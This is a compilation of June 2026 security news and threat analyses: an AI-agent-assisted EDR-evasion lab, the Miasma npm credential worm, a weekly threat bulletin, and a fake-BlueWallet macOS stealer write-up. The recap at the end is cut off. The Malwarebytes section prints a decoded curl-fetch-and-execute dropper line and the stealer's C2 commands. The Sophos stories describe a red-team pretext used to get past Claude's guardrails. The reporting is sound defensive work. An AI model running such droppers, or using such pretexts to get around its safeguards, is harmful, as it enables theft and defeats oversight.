A threat actor is using an AI-built ransomware attack toolkit that automates Active Directory discovery and helps evade endpoint detection and response (EDR) solutions. Tool and payload development was assisted by Cursor and Claude Opus agents in various stages, including initial coding, analysis, and revisioning. Additionally, some agents were tasked with checking security research posts for various bypass techniques. Some of the malware created this way was tested in virtual environments against EDR tools from Sophos, CrowdStrike, and Microsoft. Despite the malware research and development orchestrated using AI technology, the researchers note that the workflow is entirely human-driven. Rapid EDR-bypass development Researchers at cybersecurity company Sophos detected activity from the toolkit on a system at a customer environment that triggered alerts for payloads stored in C:\Users\User\Documents\test. The malicious files suggested they were part of an attack framework that focused on evading detection: Cobalt Strike profiles designed to make beacon traffic resemble legitimate web requests A Telegram bot API–based external command and control (C2) mechanism that routed communication through Telegram’s infrastructure rather than using direct connections Python-based malware development scripts for injecting shellcode into legitimate Windows executables while preserving original functionality A Cloudflare Worker acting as a front-end redirector to obscure the actual backend C2 server The researchers say that while the tool may appear as a “red team” post-exploitation framework, it is used in cybercriminal activity related to ransomware. "Our initial assessment included the possibility that a legitimate Red Team was engaged, but our investigation revealed further artifacts that indicated malicious and criminal activity," Sophos told BleepingComputer. The discovery in Cobalt Strike operator logs of entries pointing to a ransom note and details on multiple organizations listed on a ransomware data leak site clarified that the framework was used for cybercrime operations. Agentic malware development In a report published today, Sophos says that multiple Python scripts on the compromised host were written in Russian and generated with the help of AI tools. During the investigation, the researchers found a Git repository with components related to "an automated Active Directory (AD) discovery panel and a lab that uses an iterative approach to developing and testing malware against the Sophos, CrowdStrike, and Windows Defender endpoint detection and response (EDR) agents." They say that AD discovery is driven by collecting observations from completed tasks and selecting the next action from predefined choices. The next step is delegated to remote agents, with results being reassessed. The framework has multiple AI agents, each with a distinct role and function. For instance, a Claude Opus 4.5 agent acts as the coordinator of the R&D process, while others handle testing, OPSEC hardening, documentation, proxy stress testing, VM deployment, and other related tasks. For the development stage, some agents documented bypass techniques in research from Kaspersky, Palo Alto Networks, Bishop Fox, and SpecterOps, as well as details published in social media posts. The agents extracted the techniques, mapped them to the MITRE ATT&CK knowledge base of adversary behaviors, identified what was needed for reproduction, prepared a test lab, executed the technique, and reported the outcome. The main component in the malicious framework is a Python tool that generates payloads, mostly in Rust and Go, based on an evasion technique. Close to 80 modules were generated and tested against more than 70 techniques. While the agents initially suggested a high failure rate, the modules appeared to bypass almost all EDR solutions after several iterations. However, Sophos noticed discrepancies between the test output and the framework’s internal reporting in some instances, although the reasons are unclear. Sophos found no evidence that AI was embedded in deployed malware or operating independently in victim environments. Instead, the technology was used to accelerate the iterative process of developing, testing, and refining payloads against security products. AI tools are shortening the period between the publication of offensive security research and its practical implementation by threat actors. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comJun 2, 2026extracted
Threat Actor Uses AI to Build EDR Evasion Tools
A threat actor has been observed using AI coding tools to develop and refine malware designed to slip past endpoint detection and response (EDR) software, in what was presented as a red team project. The activity was uncovered by Sophos X-Ops. According to new analysis from its Counter Threat Unit, the activity was discovered after an unusual endpoint in a customer environment raised alerts for malicious files in a local test folder. Those files, alongside a linked Git repository, revealed a lab built to develop evasion tooling and test it against EDR agents from Sophos, CrowdStrike and Microsoft. Many of the Python scripts were partly AI-generated and written in Russian. Humans Stayed in the Loop The most important finding is what the AI did not do. Sophos stressed that the workflow was not run by an autonomously reasoning model, and that no AI was embedded in the malware itself. Instead, AI sped up a structured cycle of building, testing and refining that still relied on human review at each turn. The actor worked inside Cursor, an AI-native development environment, and assigned roles to several agents. One, running on Claude Opus, set the rules for the others, while the rest handled testing, operational security and documentation. A separate playbook tasked them with mining public security research, mapping techniques to the MITRE ATT&CK framework and reproducing them in the lab, with commits flowing back through the Model Context Protocol (MCP). A Red Team Cover Story At the core of the lab was a Python tool that wrapped payloads in layers of encryption and evasion to produce custom loaders, drawing on offensive frameworks such as Cobalt Strike and Sliver. Sophos said nearly 80 modules covering more than 70 techniques were built this way. The agents reported the modules became almost universally effective after iteration, though Sophos noted its documented test output did not clearly support that. Although the project was framed as red teaming, Sophos assessed that the label was likely a cover, used in part to get past Claude's guardrails around malware development. ”In reality, the framework was built for stealthy post-exploitation activity in target environments,” the team said. Sophos also linked the activity to known ransomware and data theft operations. For defenders, the company argued the shift changes little in practice, even as AI lowers the barrier to building such tooling and helps attackers find gaps faster. The team urged organizations to maintain defense-in-depth fundamentals: timely patching, multi-factor authentication (MFA), modern methods such as passkeys, and broad EDR deployment.
infosecurity-magazine.comJun 2, 2026extracted
Sophos uncovers AI-powered malware lab built for EDR evasion
Sophos uncovers AI-powered malware lab built for EDR evasion A threat actor used AI technologies to build a malware-testing framework for developing and refining endpoint detection and response (EDR) evasion techniques, according to Sophos. The investigation began after an anomalous endpoint in a customer environment triggered alerts tied to malicious payloads originating from a testing directory. The files pointed to a broader framework focused on evading detection. The environment contained Cobalt Strike profiles designed to disguise beacon traffic as legitimate web requests, a Telegram-based command-and-control mechanism, shellcode injection tools, and a Cloudflare Worker used to conceal backend infrastructure. Sophos linked the activity to ransomware deployment and data theft operations but did not identify the group involved. “We are not disclosing the ransomware group at this time due to ongoing active investigations related to this threat actor. However, it is a group that is currently active and impacting organisations globally, including in the United States,” Rafe Pilling, Director of Threat Intelligence at Sophos, told Help Net Security. AI-generated scripts and automated discovery Researchers found multiple Python scripts, many of them written in Russian, that appeared to be partially AI-generated, along with a Git repository containing an automated Active Directory discovery panel and a malware-testing lab used to evaluate payloads against Sophos, CrowdStrike, and Microsoft Defender protections. The Active Directory discovery component collected information from completed tasks, selected follow-up actions from predefined workflows, dispatched tasks to remote agents, and reevaluated results as they were returned. While the behavior resembled AI-driven automation, it did not represent an autonomously reasoning LLM. “Artifacts within the Git repository suggest that the threat actor identified potential bypass techniques from research blogs published by organizations such as Kaspersky, Palo Alto Networks, and Bishop Fox,” Sophos researchers wrote. “Information was also sourced from X and Telegram, although it is unclear if these sources influenced the tool development.” Dedicated testing lab The lab consisted of several Windows Server 2022 virtual machines used to test payloads against different EDR products. One system was dedicated to Sophos, another to CrowdStrike, while a third served as a control environment without EDR software installed. A fourth Ubuntu virtual machine hosted a Sliver command-and-control server. Multiple AI agents operated within the framework. A Claude Opus 4.5 agent coordinated activity and set rules for the other agents, while additional agents handled EDR testing, documentation, OPSEC hardening, proxy stress testing, and virtual machine deployment. The setup relied on Model Context Protocol (MCP), an open standard that enables AI assistants to interact with external tools and data sources, connecting the agents to Git repositories. The threat actor used Ludus, a platform for rapidly deploying and managing virtualized security testing environments, to provision the lab infrastructure and relied on Cursor, an AI-native integrated development environment, during the malware development process. The AI agents were tasked with reading security research, extracting attack techniques, mapping them to the MITRE ATT&CK framework, preparing test environments, executing experiments, and reporting the results. The findings suggest the threat actor presented the project as a red-team framework while interacting with Claude. Asked about the use of such framing in attempts to bypass safeguards, Sophos pointed to a broader pattern observed in recent attacks. “Attempts to bypass model safeguards using benign framing for malicious prompts, such as the use of a red team pretext, have been observed in a number of cases over the past year, including in attacks recently reported targeting government entities in Mexico. We have been in touch with Anthropic regarding our observations,” Pilling noted. At the core of the framework was a Python-based payload generation tool that produced custom Windows executables and DLLs, a type of Windows library file that programs can load and execute. The payloads incorporated encryption, evasion, and alternative execution techniques and were then used for testing. Diagram showing AI’s role in the malware development workflow (Source: Sophos) Sophos said the tool supported nearly 80 modules used to test more than 70 evasion techniques. Questions over reported success rates Documentation generated within the framework suggested the evasion modules became increasingly successful after repeated testing and refinement. However, the available test data reviewed during the investigation did not support those claims. “We don’t have the data to fully account for the discrepancies, but it’s likely that common large language model issues, such as hallucinations, played a role in the differences observed,” Pilling concluded. Despite the use of AI agents, Sophos said the defensive fundamentals remain unchanged, including patching, MFA, passkeys, and endpoint protection.
helpnetsecurity.comJun 2, 2026extracted
Supply Chain Attack Hits 32 Red Hat NPM Packages
On Monday, hackers hit Red Hat’s NPM repository in a new supply chain attack, publishing malicious versions of 32 packages to distribute a credential-stealing worm. Within a 72-second window, the threat actor published poisoned iterations across all 32 packages, likely using automation, ReversingLabs notes. The affected packages cover the entire Red Hat Hybrid Cloud Console JavaScript ecosystem and have nearly 10 million collective downloads. According to Aikido, the attackers likely compromised the CI/CD pipeline and used the GitHub Actions OIDC to publish the malicious package versions. ReversingLabs believes that the hackers had access to @redhat-cloud-services NPM scope credentials. The packages contained a preinstall hook that led to the execution of malware during NPM install, before the package is imported or used. The payload contains the string “Miasma: The Spreading Blight” and appears to be a variant of the Mini Shai-Hulud worm that TeamPCP used in several attacks against the open source software community over the past months. The hacking group released the malware’s source code last month, inviting miscreants to use it in supply chain attacks as part of a challenge. According to Ox Security, the threat actor behind the Red Hat compromise infected a repository on May 29, likely to test its capabilities. The malware was designed to harvest “GitHub Actions secrets, npm tokens, cloud credentials, Kubernetes and Vault material, SSH keys, Git credentials, and other sensitive files,” Socket reports. Like Mini Shai-Hulud, it exfiltrates the collected data to an attacker-controlled server and uses a GitHub-based fallback mechanism, publishing the stolen information to newly created public repositories. While the full scope of infection is yet unknown, Ox identified 210 repositories containing stolen credentials, suggesting that at least as many developers were infected after downloading and installing the malicious Red Hat package versions. The malware was also observed attempting to use stolen GitHub tokens to enumerate repositories. It contains a GitHub Actions workflow modification logic and can write malicious index.js payloads into repositories/actions. Red Hat maintainers have published clean versions of all 32 affected packages, and the malicious iterations have been removed from NPM. Users are advised to update to a clean release as soon as possible. Anyone who installed a malicious version should consider their system and build environment compromised and should immediately rotate credentials, tokens, API keys, and other sensitive information the malware might have accessed. Developers are also advised to check transitive dependencies, as the packages are widely used as indirect libraries, and to monitor their environments for anomalous outbound connections. Related: ‘SymJack’ Attack Turns AI Coding Agents Into Supply Chain Attack Delivery Systems Related: Over 5,500 GitHub Repositories Infected in ‘Megalodon’ Supply Chain Attack Related: Grafana Says Codebase and Other Data Stolen via TanStack Supply Chain Attack
securityweek.comJun 2, 2026extracted
Miasma Supply Chain Attack Compromises Red Hat npm Packages with Credential-Stealing Worm
A new Mini Shai-Hulud supply chain attack campaign, codenamed Miasma, has compromised @redhat-cloud-services packages to steal credentials and secrets from developer machines and deliver a self-propagating worm. "This is effectively a Mini Shai-Hulud campaign: it uses the same core tactics of install-time execution, credential harvesting, CI/CD targeting, encrypted exfiltration, and potential downstream propagation," Socket said. Exactly who is behind the attack activity is presently unknown given that TeamPCP (aka Replicating Marauder, TGR-CRI-1135, and UNC6780), an infamous cybercrime group, has open-sourced the attack tools linked to the Shai-Hulud worm, opening the door for other threat actors to pull off similar attacks and making definitive attribution harder. The names of some of the affected packages are listed below - @redhat-cloud-services/vulnerabilities-client @redhat-cloud-services/tsc-transform-imports @redhat-cloud-services/topological-inventory-client @redhat-cloud-services/sources-client @redhat-cloud-services/rule-components @redhat-cloud-services/remediations-client @redhat-cloud-services/rbac-client Per analyses from Aikido Security, JFrog, Microsoft, OX Security, ReversingLabs, SafeDep, StepSecurity, and Wiz, the npm packages contain an obfuscated preinstall hook that's designed to collect GitHub Actions secrets, npm tokens, cloud credentials, Kubernetes and Vault material, SSH keys, Git credentials, and other sensitive files. Like observed in prior Mini Shai-Hulud waves, the malware also contains encrypted exfiltration logic that transmits the data to "api.anthropic[.]com:443/v1/api" and uses GitHub as a fallback mechanism. This indicates attempts made by the attacker to both steal credentials and weaponize them to further poison the software supply chain. "It commits the encrypted result envelope through the GitHub API," Socket said. "The commit message can include: IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner: ." Another noteworthy step carried out by the malware is to avoid execution on Russian-language systems, a pattern also observed in the GlassWorm supply chain campaigns. "For npm, the payload calls the OIDC token exchange and whoami endpoints, repackages a tarball (updateTarball, package-updated.tgz), and signs the artifact through Sigstore," SafeDep said. "Stolen credentials exfiltrate to attacker-created public GitHub repositories, each carrying the description Miasma: The Spreading Blight." The first commit containing the "Miasma: The Spreading Blight" string appeared on May 29, 2026, OX Security noted, indicating that either this variant was active since then, or the threat actor started testing around that time. As for GitHub, the malware enumerates repositories the token can write to, reads action.yml/action.yaml via GraphQL, and commits a workflow through the createCommitOnBranch mutation so that the commit appears as a verified, signed change. Other actions carried out by the malware are listed below - Attempt privilege escalation by launching a container that bind-mounts the host /etc/sudoers.d and grants the CI runner passwordless sudo Check for endpoint protection from CrowdStrike, SentinelOne, Carbon Black, and StepSecurity Harden-Runner before commencing the malicious actions Establish persistence by injecting a SessionStart hook to Anthropic Claude Code and a tasks.json with "runOn": "folderOpen" for Microsoft Visual Studio Code projects so that the malware is automatically launched during every session "One of the main changes in this new variant is the addition of new data collectors focused on cloud identities," Wiz researchers said. "Specifically, collectors for GCP and Azure identities were added that collect all identities the infected machine has access to. While previous versions of the malware primarily focused on extracting secrets from these environments, this variant suggests an increased attacker focus on gaining and leveraging access to the cloud itself. Unlike previous versions, the malware has also been found to generate a uniquely encrypted payload for each infection, thereby making detection and version tracking significantly more challenging. Evidence suggests that the compromise of a Red Hat employee's GitHub account was the patient zero that was used to inject the payload into these packages. The compromised account is said to have pushed malicious orphan commits to two RedHatInsights repositories, bypassing code review. It's recommended to isolate hosts that have installed the affected versions, remove the malicious versions, rotate exposed credentials, review for any signs of suspicious GitHub or npm activity, audit the environment for persistence artifacts that involve changes to configuration files (~/.claude/settings.json, .vscode/tasks.json, .github/workflows/codeql.yml, .github/setup.js), and enforce strong access controls. "Because the malware includes background execution and potential developer-tool persistence mechanisms, uninstalling the npm package or deleting node_modules should not be considered sufficient cleanup," Socket explained. "For CI/CD systems, suspend affected workflow runs, invalidate build artifacts produced during the exposure window, and review whether any release, container image, npm package, or deployment artifact was created after the malicious package was installed." Update Dark web monitoring and threat intelligence firm Whiteintel said it "detected a Red Hat GitHub credential and session cookie in infostealer logs on April 13 and May 15, 2026," raising the possibility that this information may have been used to break into the employee's account. The development is the latest in a number of supply chain attacks that have targeted the open-source ecosystems over the past couple of months. These attacks have impacted well-known projects, including Aqua Trivy, Checkmarx KICS, Bitwarden, SAP, TanStack, and GitHub, and Nx Console. Last month, a separate campaign codenamed Megalodon was found to have injected malicious GitHub Action workflows to harvest CI/CD secrets, cloud credentials, and tokens, impacting both development and deployment pipelines in public GitHub repositories. "These recent incidents, including the GitHub compromise via a malicious Nx Console Visual Studio Code (VS Code) extension and the 'Megalodon' supply chain intrusion campaign, demonstrate how cyber threat actors are abusing tools and processes that support enterprise, cloud, and DevOps environments - specifically CI/CD pipelines, code extensions and workflows," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said.
thehackernews.comJun 1, 2026extracted
1st June – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 1st June, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Carnival Corporation, a global cruise line operator, has confirmed a data breach affecting nearly 6 million people after attackers used social engineering to compromise an employee account. Exposed information may include names, contact details, dates of birth, and government identification numbers. Charter Communications, a US telecommunications provider operating under the Spectrum brand, has suffered a data breach by ShinyHunters group. Analysts report that 4.9 million email addresses were exposed, with names, phone numbers, physical addresses, and a subset of employee directory records. Lithuania’s Centre of Registers, the state agency responsible for property and legal entity records, has disclosed a data breach affecting more than 600,000 records. Attackers reportedly misused institutional login credentials to access names, dates of birth, national identification numbers, and property-related data. Station Casinos, a major Las Vegas casino operator owned by Red Rock Resorts, has disclosed a breach after an unauthorized third party accessed a single employee account and associated files. The company began notifying affected individuals on May 21 and said business operations were not affected. AI THREATS Researchers profiled GREYVIBE, a Russia-aligned group using ChatGPT and Google Gemini to accelerate phishing, malware development, and post-compromise activity against Ukrainian targets. The campaign uses spear-phishing, fake CAPTCHA pages, and decoy websites to deliver PhantomRelay on Windows and FallSpy on Android. Researchers unveiled an AI-driven influence and fraud campaign run by a Russian-speaking actor behind a MAGA-themed Telegram channel with 17,000 subscribers. The operator bypassed Gemini safeguards to automate propaganda and credential theft, used stolen API keys, cracked WordPress accounts, and drained a crypto wallet. Researchers identified an AI-generated malicious npm package, mouse5212-super-formatter, that steals developers’ files by scanning a local directory and uploading data to a GitHub repository using a hardcoded private token. The package recorded at least seven exfiltration events and 676 downloads. VULNERABILITIES AND PATCHES Check Point announced a Jumbo Security Release based on large-scale AI-driven code scanning across the products. The release addresses vulnerabilities in Check Point security gateways, including CVE-2026-48131 and CVE-2026-48132. The vulnerabilities were not exploited in the wild. Check Point IPS provides protection against these threats (IKE Unsigned Underflow (CVE-2026-48131), IKE Improper Length Validation (CVE-2026-48132)) CVE-2026-0257, a PAN-OS GlobalProtect authentication bypass which was fixed earlier this month, is now being exploited against unpatched Palo Alto Networks devices. Attackers are using forged authentication override cookies to create unauthorized VPN sessions, potentially giving them access to internal networks. CISA added the flaw to its Known Exploited Vulnerabilities catalog on May 29. A critical remote code execution flaw has been disclosed in Gogs, a popular open-source self-hosted Git service, with a CVSS score of 9.4 and no patch available. An authenticated user can abuse rebase merging to execute commands, risking repository access and cross-tenant data exposure. The vulnerability remains unpatched by the developer for more than two months. Check Point IPS provides protection against this threat (Gogs Remote Code Execution) Ghost CMS vulnerability CVE-2026-26980 is actively being exploited in attacks that use SQL injection to steal Admin API keys and alter website pages. At least two groups have targeted more than 700 sites using fake Cloudflare checks to deliver data-stealing malware. Check Point IPS provides protection against this threat (Ghost SQL Injection (CVE-2026-26980)) THREAT INTELLIGENCE REPORTS Researchers attributed a destructive campaign against LA Metro to an Iran-linked intelligence operation using the Ababil of Minab persona. LA Metro confirmed an intrusion involving wiped servers, and analysts linked additional transit and technology attacks to Black Shadow infrastructure. Researchers observed renewed Grandoreiro banking malware campaigns targeting Portuguese banks and organizations across Spain, Mexico, and Latin America. The attacks begin with phishing and using DLL side-loading or malicious scripts, then abuse cloud services to hide traffic while stealing credentials and displaying fake banking overlays. Researchers uncovered GHOST STADIUM, a fraud network cloning FIFA-related websites across more than 300 active domains ahead of the 2026 World Cup. The operation steals login credentials and payment data, locks fans out of accounts, and is promoted through Facebook ads. Researchers exposed JINX-0164, a financially motivated group targeting cryptocurrency organizations through recruiter-themed social engineering and macOS malware, including AUDIOFIX and MINIRAT. The campaigns moved from compromised developer laptops into code repositories and build systems, creating supply chain compromise risk.
research.checkpoint.comJun 1, 2026extracted
Fake BlueWallet steals passwords, accounts, and crypto from Macs
A fake website impersonating BlueWallet (a real Bitcoin wallet) is targeting Mac users with a simple but effective attack. BlueWallet itself has not been compromised. Instead, cybercriminals have stolen the name and branding of the legitimate Bitcoin wallet to make a malicious download appear trustworthy. If you went looking for a cryptocurrency wallet and landed on one of these fake BlueWallet download pages, the site tried to trick you into opening a downloaded file in a built-in macOS tool and pressing “Run.” If you followed those instructions, the malware could steal saved passwords, browser logins, cryptocurrency wallets, documents, and other sensitive data. It also watches the clipboard for cryptocurrency wallet addresses and can replace them with attacker-controlled addresses.. That last feature is particularly dangerous. If you copy a wallet address before sending funds, the malware can silently replace it with the attacker’s address. Everything looks normal on screen, but the money goes somewhere else. Should you worry? Only if you downloaded and ran the file. Simply visiting the page and closing it does nothing on its own. The attack depends entirely on the user opening the script and pressing play. If you did run it, treat the machine as compromised and follow the steps below. What to do if you may have run it If you opened the file and pressed play, assume your device was compromised and work through these steps: Disconnect the machine from the network to cut the control channel Run a full scan of the device, and make sure you’re using up-to-date security software with web protection enabled From a different, trusted device, change passwords for any accounts used on the Mac, starting with email and cryptocurrency exchanges Move any cryptocurrency to a new wallet created on a clean device Treat existing seed phrases and keys as exposed Before sending crypto in future, verify the full destination address character by character Check for and remove unfamiliar files in ~/Library/LaunchAgents Look for a hidden .sysupd.sh file in/tmp Rotate cloud and SSH credentials if .ssh ,.aws , or.gnupg files were present on the machine When in doubt, back up your data and reinstall macOS from a known-good source rather than trying to clean in place Picked up something you shouldn’t have? Social engineering tricks The most interesting part of this campaign isn’t technical. The attackers didn’t break into the Mac or bypass Apple’s security protections. They persuaded victims to run the malware themselves. The fake website walks users through the process with a convincing download page, simple instructions, and even a keyboard shortcut. The attack succeeds because the victim trusts what they are seeing. As operating systems get better at blocking malicious software, attackers are increasingly investing in social engineering. Instead of finding ways around security controls, they convince people to click through them. That’s why one habit is becoming increasingly important: Be suspicious of any download that arrives with instructions to open it in a scripting tool, developer utility, or Terminal window and press “Run.” In this campaign, a single press of ⌘R was enough to turn a Mac into a password stealer, cryptocurrency wallet thief, clipboard hijacker, and remote access tool. Technical analysis Stage one: The AppleScript downloader The page lives at update-bluewallet[.]com, a domain name close enough to the real wallet (bluewallet.io) to pass a quick glance. The first thing the page does is not wait for consent. Its script calls a download routine on a two-second timer the moment the page loads, and again if the visitor clicks either of two buttons. The file that lands in the Downloads folder is named BlueWallet Installer.applescript, an extension most people have never seen and have no instinct to distrust. Then the page does something quietly clever. After a short delay, it rewrites its own status text to read like setup instructions: open the installer, then press the play button or ⌘R. It even draws a small blue play triangle in the text so the wording matches the real Script Editor interface the victim is about to see. The page walks the victim through the exact motions needed to run the file. On modern macOS, an unsigned application downloaded from the web gets quarantined and checked before it can run. A plain script opened in Script Editor and executed by the user sidesteps that flow. The person is manually instructing a trusted Apple tool to run code, so there is no notarization gate to fail. This is why the attacker chose an AppleScript instead of a packaged app: it moves the risky action out of the operating system’s hands and into the victim’s. The AppleScript itself is remarkably short. Stripped of its decorative comments, including a fake version number and a line claiming to be a “Brew Install Upgrade,” it runs a single base64-encoded shell command and then tells Script Editor to quit without saving, removing the evidence from view. Decoded, that command does this: curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 & It fetches a second script from a remote host, saves it to a hidden file in the temp directory, makes it executable, and runs it in the background with all output suppressed. The victim sees nothing. The filename .sysupd.sh is dressed up to look like a system update. This is a textbook staged dropper: stage one is tiny and disposable, and its only job is to fetch the real payload. Stage two: Payload analysis The first lines establish how the malware intends to operate. It sets umask 077 so everything it creates is readable only by the compromised user, then builds a hidden, randomly named working directory under /tmp seeded from /dev/urandom. Its configuration is obfuscated, but weakly. A small function named _xd walks a hex string two characters at a time and XORs each byte against a hardcoded repeating key: swckR9JCD2Uu. That function decodes the script’s Telegram bot token, chat identifier, secondary command token, and staging URL at runtime. It is enough to defeat tools that only search for plaintext strings, but not much more. Because the key and algorithm are both sitting in the file, every encoded value is fully recoverable. One detail stands out: The decoded Telegram chat value and decoded command-and-control chat value are identical. The attacker is using a single Telegram channel as both the exfiltration drop and the control channel. It is cheap, scalable, encrypted, and blends into ordinary HTTPS traffic. Not everything is obfuscated. The clipboard-hijacking addresses are sitting in the file in plain text: a Bitcoin address, an Ethereum address, and a Solana address. These are the addresses the implant swaps in when it catches you copying a wallet address. Because they are public on their respective blockchains, they are also among the most useful artifacts in the whole sample. What the malware steals The second stage’s collection routines are sweeping. They pull from six broad categories. 1. Web browsers The script extracts history, cookies, login data, and bookmarks from a wide range of browsers, including: Chromium-based browsers: Google Chrome Stable, Beta, Canary, and Dev; Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; and Yandex Firefox-based browsers: Firefox, Waterfox, Pale Moon, Zen, and LibreWolf macOS native browser data: Safari cookies, history, and form values 2. Cryptocurrency wallets This appears to be the script’s primary focus. It targets desktop wallet applications including Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper. It also targets browser-extension wallets across several ecosystems: Bitcoin: Xverse, Leather, UniSat, Alby, and Wizz Solana: Phantom, Solflare, Backpack, Nightly, MagicEden, Sollet, and Slope EVM wallets: MetaMask, Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin, and XDEFI Cosmos: Keplr, Station, and Cosmostation Other ecosystems: Yoroi, Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos, and Temple 3. Password managers and security tools The malware targets local storage and settings for several password managers, including LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup. It also looks for data associated with 2FA and authenticator tools, including Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP. 4. Communication and social apps The script attempts to copy session data and local storage for Telegram Desktop and Discord, including Discord Canary and Discord PTB. 5. Developer and cloud tools It looks for credentials and configuration files in the user’s home directory, including: AWS CLI configurations in .aws SSH keys in .ssh GnuPG keys in .gnupg Kubernetes configs in .kube Shell and Git files including .zshrc ,.zsh_history ,.bash_history , and.gitconfig 6. Productivity apps and general files The script copies the local Apple Notes database, NoteStore.sqlite. It also looks for browser-extension data related to shopping and productivity tools, including Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep. Finally, it scans Desktop, Documents, and Downloads for files with extensions including .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env, under a size cap. What it does with the stolen data The malware tries to capture the user’s account password directly. An osascript dialog titled “System Preferences” asks the user to re-enter their password “to continue.” The script validates each attempt against dscl . authonly before saving it, so it only stops once it has a working credential. For exfiltration, it archives the staged data with macOS’s own ditto, likely because it is always present, unlike zip. To stay under Telegram’s 50 MB upload limit, it breaks larger archives into 49 MB chunks with split before sending each part. It establishes persistence by writing a LaunchAgent plist into the user’s ~/Library/LaunchAgents, backed by a hidden support directory, and loading it with launchctl so the implant runs again at every login. The clipboard hijack is a live background loop. A clip_watch function continuously inspects the clipboard, matches Bitcoin, Ethereum, and Solana address formats by regex, reports the original address to the command-and-control channel, and overwrites the clipboard with the attacker’s address via pbcopy. That means the substitution happens silently between copy and paste. Finally, the malware can be controlled interactively. A c2_loop polls the Telegram bot for commands and supports a full operator toolkit: /info for system details /exec for arbitrary shell commands /clipboard to read current clipboard contents /download to pull specific files /exfil to rerun the theft module /selfdestruct to wipe traces This makes the Telegram channel a real-time remote-control link, not just a one-way drop. Living off the land, and off Telegram The pattern here is familiar and getting more common: lean on tools that are already trusted. The delivery abuses Apple’s own Script Editor. The configuration hides behind a trivial XOR rather than packed binaries. The command channel rides Telegram’s Bot API, which can pass through egress filters that would flag an unknown server. None of these pieces is novel on its own. The effectiveness comes from stacking legitimate-looking components so no single step trips an alarm. Detection opportunities The lessons here are less about the lure and more about the technique itself. Script Editor executing a one-line base64 do shell script that immediately quits is a strong behavioral signal, and a far better detection target than the disposable stage-one file. So is a hidden /tmp/.sysupd.sh downloaded by curl and launched in the background. Browsers and download surfaces could treat .applescript files arriving from the web with the same suspicion as executables. And Telegram remains an under-addressed command-and-control medium that bot-token abuse reporting could disrupt at the source. Indicators of Compromise File hashes (SHA-256) 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript ) Network indicators update-bluewallet[.]com projects2026box[.]com Clipboard-hijack addresses BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v From reporting threats to removing them. Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
malwarebytes.comJun 1, 2026extracted
⚡ Weekly Recap: New Linux Flaw, PAN-OS Exploit, AI-Powered Attacks, OAuth Phishing and More
Monday hit like a cron job with anger issues. A busted auth path here, a repo-side faceplant there, some "patched-ish" thing already getting chewed on in the wild, and then the usual bonus round: poisoned dev tools, sketchy forum chatter, phishing kits pretending to be productivity, and AI lowering the bar for people who already thought 'curl | sh' had a personality. The vibe is simple: old bugs, new wrappers, faster abuse. Patch the obvious crap first. Then read the rest. ⚡ Threat of the Week PAN-OS GlobalProtect Authentication Bypass Under Exploitation - Palo Alto Networks warned that a recently disclosed medium-severity security flaw impacting PAN-OS and Prisma Access has come under active exploitation in the wild. The vulnerability, tracked as CVE-2026-0257 (CVSS score: 7.8), refers to a case of authentication bypass that could be exploited by bad actors to set up VPN connections. The issue specifically affects firewalls with GlobalProtect portal or gateway configured when authentication override cookies are enabled and a specific certificate configuration exists, the network security company said. Securing AI Use Within Your Organization Starts Here The risks of ungoverned AI within your organization are compounding at machine speed. Turn your AI security priorities into actionable steps with this step-by-step guide. Download Now ➝ 🔔 Top News Critical Unpatched Flaw in Gogs - The popular open-source self-hosted Git service Gogs is affected by a critical-severity zero-day vulnerability that exposes servers to remote code execution (RCE), per Rapid7. The injection flaw can be exploited by authenticated attackers via pull requests with malicious branch names. "Since Gogs ships with open registration enabled by default and no limit on repository creation, an unauthenticated attacker can simply create an account and repository on any default-configured instance," the cybersecurity firm says. Any repository owner can enable rebase merging with a single toggle in settings, and the entire exploit chain can be operated without interaction from any other user. Attackers with write access to repositories that have rebase enabled can exploit the flaw directly. "The result is arbitrary command execution as the Gogs server process user, giving the attacker the ability to compromise the server, read every repository on the instance (including other users' private repos), dump credentials (password hashes, API tokens, SSH keys, 2FA secrets), pivot to other network-accessible systems, and modify any hosted repository's code," Rapid7 said. Gogs servers across Windows, Linux, and macOS that are running default configurations are affected. No patch has been released as of the time of publishing. GlassWorm C2 Taken Down - CrowdStrike, Google, and the Shadowserver Foundation dismantled the GlassWorm malware operation by taking down all four of GlassWorm's command-and-control (C2) channels simultaneously on May 26, 2026, at 2 p.m. UTC. GlassWorm, since its emergence last year, has conducted a "multi-pronged campaign" using trojanized VS Code extensions published on both the Microsoft VS Code Marketplace and Open VSX. The campaign is also known to have introduced malicious code through compromised npm and Python packages. By taking down all four channels at the same time, the action severed the operators' access to the infected hosts and their ability to deliver new commands. Evidence suggests that GlassWorm's operators are of Russian origin: the malware checks the system's locale and avoids infecting machines in CIS countries, and its code contains Russian-language 